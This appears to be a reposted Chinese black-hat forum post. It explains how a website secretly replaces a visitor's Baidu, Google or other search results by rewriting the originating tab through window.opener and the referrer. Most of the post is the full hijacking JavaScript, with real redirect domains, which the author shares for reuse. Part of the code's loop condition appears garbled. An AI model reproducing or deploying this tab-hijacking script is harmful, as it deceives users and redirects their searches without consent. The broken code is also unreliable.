来自:黑帽网
链接:http://bbs.cnblackhat.com/thread-9218-1-1.html(点击尾部阅读原文前往)
百度搜索关键词点击后自动更换替换掉原有搜索结果分析(好几年前了,还是有很多人在用)
这个技术的话不是什么难的技术,不懂得人说百度被劫持了。其实只不过是本地执行了个js的脚本替换了下搜索结果而已。没什么大惊小怪。而且这种站点只能做黑帽。做白帽的用这种技术,百度发现会直接屏蔽掉这个站点。
下面看分析:
1、正常搜索一个关键词注意我们的网站地址!
2、点进去这个关键词url之后的网站。
3、切换到之前的选项卡里面,查看下地址框!
本地百度被替换掉了。这就是所谓的劫持。其实是本地浏览器被更改了。
4、我们分析下这个网站的源码:
不难发现有个特殊的javascript 的。而且不正常的东西。
5、点进去看下就会知道原因了。代码都在里面。
代码我备注一份吧。留着大家分享下。
var eg=[['www.google.com.hk/','&safe=strict&sitesearch=','',''],['www.google.com.tw/','&safe=strict&sitesearch=','',''],['www.google.com/','&safe=strict&sitesearch=','',''],['209.116.186.217/','&safe=strict&sitesearch=','',''],['www.baidu.com/','&ct=2097152&tn=0051&si=','baidu','baidu.com'],['www.haosou.com/','&rg=1&site=','haosou','haosou.com'],['cn.bing.com/','&rg=1&site=','',''],['sg.search.yahoo.com/','&site=','',''],['www.youdao.com/','&site=','',''],['www.sogou.com/','&site=','sogou','sogou.com'],['www.soso.com/','&site=','','']];
var p=undefined;
try{if(window.opener)
{p=window.opener.location.href.toLowerCase();}
}
catch(e){}if(!p){p=document.referrer.toLowerCase();}
for(i=0;i0)
{var t=p+eg[i][1]+'www.fzleim.com';
if(eg[i][0]=='www.baidu.com/')
{var arr = /&wd\=.*/.exec(p);
var keyword='';
if(arr!=null && arr.length>0){keyword = arr[0].replace('&wd=','')};
t='http://www.baidu.com/s?ct=2097152&ie=UTF-8&cl=3&wd='+ keyword +'&si=www.fzleim.com'};
var jump_value = '';
if(document.getElementsByTagName('meta')['jump_key']!=undefined)
{jump_value = document.getElementsByTagName('meta')['jump_key'].getAttribute('content')}if(jump_value==undefined || jump_value==null){jump_value = ''}
if(eg[i][2].length>0){t='http://'+eg[i][3]+'.cnlanshan.com/url/www_fzleim_com/' + eg[i][2] + '/'+ jump_value}window.opener.location.href=t;break;}}; }
●本文编号180,以后想阅读这篇文章直接输入180即可。
●输入m可以获取到文章目录。
更多推荐请看《15个技术类公众微信》
联系客服